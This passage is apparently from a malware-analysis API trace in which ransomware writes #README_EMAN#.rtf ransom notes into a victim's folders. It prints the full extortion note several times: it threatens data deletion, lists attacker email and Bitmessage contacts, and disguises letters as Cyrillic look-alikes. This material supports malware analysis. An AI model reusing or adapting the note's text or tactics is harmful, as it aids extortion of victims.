n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¦}x|¨?Ú¼\x99,¼øûÙÜ#ºP©ª|MÈ£\x8e\x01", lpUsedDefaultChar=0x0) returned 8717 [0283.698] WriteFile (in: hFile=0x2cc, lpBuffer=0x235c8a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235c8a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.699] CloseHandle (hObject=0x2cc) returned 1 [0283.699] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0283.699] GetLastError () returned 0x2 [0283.699] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 